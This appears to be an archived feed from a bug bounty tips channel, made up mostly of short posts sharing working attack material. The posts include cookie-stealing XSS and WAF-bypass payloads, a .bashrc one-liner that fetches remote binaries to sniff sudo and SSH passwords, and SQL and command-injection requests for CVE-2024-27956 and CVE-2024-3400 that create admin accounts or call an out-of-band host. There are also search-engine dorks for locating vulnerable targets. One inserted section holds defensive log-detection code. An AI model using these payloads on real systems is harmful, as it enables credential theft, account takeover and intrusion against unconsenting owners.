Bug bounty Tips

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

5 846 subscribers (+16 in 24 hours, +67 in 7 days, +375 in 30 days)

Post archive
mile2 | Certified Professional Ethical Hacker Info : https://mile2.com/cpeh_outline

Over 50,000 Tinyproxy hosts are found vulnerable to CVE-2023-49606
"A specially crafted HTTP header can trigger reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution," Talos said in an advisory last week. "An attacker needs to make an unauthenticated HTTP request to trigger this vulnerability."
https://talosintelligence.com/vulnerability_reports/TALOS-2023-1889

Here is a PoC (proof-of-concept) for CVE-2023-40000. You can now replicate the attack ❤️ https://github.com/rxerium/CVE-2023-40000

LiteSpeed Cache has a flaw which allows users to create WP (WordPress) admin accounts: CVE-2023-40000

Hello everyone, this is a new information gathering bot, where you get all the information via email, phone number, username and more. Please do check it and give feedback.

Here is a complete SSRF guide.
A very good guide for beginner to advanced users; it will make you stronger in finding SSRF.
Hit a like 👍

Bypassed the strong Akamai WAF of the USA Department of Justice. Payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

This list contains all the top working XSS bypasses, including top hunters' successful payloads. This will surely help you; you must try it, and don't forget to mention me if any payload in this list works for you. I know 100% it works ❤️ It took me so much time to collect all these top payloads from LinkedIn, Twitter and GitHub with their success rates; every payload in this list has worked for someone, and also for me in real bounty programs! Most of the payloads are for Cloudflare WAF bypass, so try it when you are blocked by the Cloudflare WAF.

Attachment: wafbypass.txt (0.08 KB)

Cloudflare XSS protection WAF bypassed! Payload used: <Img Src=OnXSS OnError=confirm(document.cookie)> #bugbounty #infosec

😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ] A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀

command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/script" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'

🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking

🐥 [ tweet ] Neat, it reminded me of https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger

👩‍💻 PoC for WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) (CVSS 9.9) Since "q" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly. Adding a new WordPress user:
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28
Giving the user admin rights:
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c
PWNED! Note: the "integ" param is the md5sum of the query. 6K+ services are found: https://hunter.how/list?searchValue=web.body%3D%22wp-content%2Fplugins%2Fwp-automatic%22 Tweet: https://x.com/mrtuxracer/status/1784229071460692232?s=12

CVE-2024-3400 Palo Alto OS Command Injection Send this HTTP request:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
This will create the hellome1337.txt file on the server with root access. Now if you try to access the file you should receive a 403 instead of a 404. Command injection:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Fofa
app="paloalto-GlobalProtect"
https://en.fofa.info/result?qbase64=YXBwPSJwYWxvYWx0by1HbG9iYWxQcm90ZWN0Ig%3D%3D
Zoomeye
app:"Palo Alto Networks firewall httpd"
https://www.zoomeye.hk/searchResult?q=app%3A%22Palo%20Alto%20Networks%20firewall%20httpd%22&from=5o6o54m5MjQwNDE0MDE=
Hunter.how
product.name="GlobalProtect Portal"
https://hunter.how/list?searchValue=product.name%3D%22GlobalProtect%20Portal%22
Shodan
http.favicon.hash:-631559155
More Info : https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/ https://github.com/h4x0r-dz/CVE-2024-3400 https://github.com/W01fh4cker/CVE-2024-3400-RCE
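Both PoCs above (CVE-2024-27956 and CVE-2024-3400) leave request-level indicators a defender can match in proxy or WAF logs. The following is an added example, not code from this channel or from either vendor: it checks parsed requests (path, Cookie header, POST body) for the SESSID traversal/backtick pattern on /ssl-vpn/hipreport.esp, and for raw SQL in the wp-automatic "q" parameter whose "integ" equals md5(q) as the post states. The endpoint name ENDPOINT.php and the sample traffic are constructed placeholders, since the post gives only the plugin path.

```python
import hashlib
import re
from urllib.parse import parse_qs, unquote
# Indicators from the two posts above: CVE-2024-3400 abuses the SESSID cookie on
# /ssl-vpn/hipreport.esp; CVE-2024-27956 sends raw SQL in "q" with integ = md5(q).
HIP_PATH = "/ssl-vpn/hipreport.esp"
WP_AUTO = "/wp-content/plugins/wp-automatic/"
SESSID_RE = re.compile(r"SESSID=([^;]*)")
SQL_RE = re.compile(r"\b(INSERT|UPDATE|DELETE|SELECT|UNION|DROP)\b", re.I)

def check_globalprotect(path, cookie):
    """Flag a SESSID value carrying path traversal or shell metacharacters."""
    m = SESSID_RE.search(cookie or "")
    if not path.startswith(HIP_PATH) or not m:
        return None
    val = unquote(m.group(1))
    if "../" in val or "`" in val or "$(" in val or "${IFS}" in val:
        return "CVE-2024-3400"
    return None

def check_wp_automatic(path, body):
    """Flag raw SQL in the q parameter posted to the wp-automatic plugin."""
    if not path.startswith(WP_AUTO):
        return None
    params = parse_qs(body or "", keep_blank_values=True)
    q = params.get("q", [""])[0]
    if not SQL_RE.search(q):
        return None
    # The post says integ is the md5 of the query; a match raises confidence.
    integ = params.get("integ", [""])[0].lower()
    suffix = " (integ == md5(q))" if integ == hashlib.md5(q.encode()).hexdigest() else ""
    return "CVE-2024-27956" + suffix

def scan(requests):
    """requests: iterable of (path, cookie, body); returns [(path, finding)]."""
    hits = []
    for path, cookie, body in requests:
        hit = check_globalprotect(path, cookie) or check_wp_automatic(path, body)
        if hit:
            hits.append((path, hit))
    return hits

# Constructed sample traffic; ENDPOINT.php is a placeholder (the post names no endpoint).
_Q = "INSERT INTO wp_users (user_login) VALUES ('poc')"
SAMPLE = [
    (HIP_PATH, "SESSID=abc123;", ""),
    (HIP_PATH, "SESSID=/../../../var/appweb/sslvpndocs/x.txt;", ""),
    (HIP_PATH, "SESSID=./../../../opt/panlogs/tmp/h4`id`;", ""),
    (WP_AUTO + "ENDPOINT.php", "", f"q={_Q}&auth=%20&integ={hashlib.md5(_Q.encode()).hexdigest()}"),
]
```

Running scan(SAMPLE) flags the two traversal/backtick SESSID requests and the SQL-bearing wp-automatic request, while the plain-session request passes.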


Today I reported an admin bypass. It was very easy: first it was admin.x.com; I checked it and checked /dashboard, and it loaded but I automatically got logged out, and I tried other directories; /dashboard ---> redirected to /login

Binary Exploitation Notes
Stack, Heap, Kernel and Browser Exploitation
https://ir0nstone.gitbook.io/notes credit : Andrej Ljubic

Story of a very quick RCE 📝
• Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
You can add these paths to your wordlist:
• cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
• cgi-bin/reset.cgi?db_prefix=%26id%26
Fuzzing as well:
• cgi-bin/FUZZ.cgi?FUZZ=%26id%26
#bugbountytips ❤️

JS Key Strings for JS Hacking CC - Jhaddix #bugbounty #Infosec #bugbountytips

Path Traversal Affecting Multiple CData Products CRITICAL SRC: https://tenable.com/security/research/tra-2024-09 PoC: 👆

🚨 XSS hunting from waybackurls 🔍 Payload:
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
credit : gudetama_bf #bugbountytips #bugbounty